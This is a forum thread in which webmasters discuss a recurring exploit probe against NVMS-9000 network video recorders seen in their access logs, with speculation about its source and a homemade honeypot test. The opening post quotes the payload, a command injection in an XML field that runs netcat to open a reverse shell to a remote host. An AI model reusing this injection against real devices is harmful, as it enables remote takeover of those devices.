exploit, looking for NVMS-9000-series no-name PVR type network-attached devices. payload contains the following shellcode in an attempt to gain root shell of the device ( ${IFS} replaced with spaces for clarity ).
<ip>$(nc xx.xxx.xx.xxx 31337 -e $SHELL&)</ip>

IP address in the shellcode is usually differenf from the originating IP, suggesting there's more than a rookie scripkiddie behind this.

[edited by: engine at 11:27 am (utc) on Oct 26, 2019]
[edit reason] obfuscated ip [/edit]

@honeyandpot (kewl moniker!) Welcome to Webmasterworld!

The bad actors are everywhere and we need to stay alert!

Thanks for confirmation and info, and welcome, honeyandpot! I'm seeing this exploit three to four times a day now, always the exact same UA/URI/Request Method. A sprinkling of US IPs but most are elsewhere.

I'm seeing this exploit three to four times a day now

Every time I read about a robot that I've never set eyes on, I get to wondering what triggers its arrival. Obviously not something basic like the presence of some standard CMS, since that kind of thing gets requested regardless. (Business with search engine tells me that around 1/3 of all websites [w3techs.com] use WP--though it certainly doesn't follow that 1/3 of all web traffic is to WP pages.)

Cursory research suggests that it really is a new robot, since everything with a visible date is from this month. (Cursory research also reveals that a heck of a lot of people's access logs somehow ended up in crawlable and hence indexable locations, suggesting a major ineptitude on the part of one or more hosts.) It doesn't look as if the URL is associated with any well-known CMS, so where are they getting it from? With different casing, it's the contact address for at least one British newspaper, but that's probably a red herring unless something sneaked into a script by mistake.

Heh ... api can also be bogus "application program interface". (wink wink nudge nudge)

last week got curious enough to set up a bit of a logger and a 'reverse honeypot' - with my script trying to connect to the service, pretending being a 'compromised router'. and sure curiosity killed... only a bit of time and effort that could be probably spent more productively.

to my surprise all those requests, although coming from all around the globe, refer to just a couple of IP addresses one in the Seychelles (of course that one rather exotic location was a main cause of my curiosity) an the other one in Cheyenne, WY. not publishing IPs here, seems they get stripped anyways. and the main thing: none of the IPs has ever responded. apparently the whole thing is some kind of a packaged solution like multiple vulnerability scanner that people just don't bother setting up properly and run with mostly default configuration.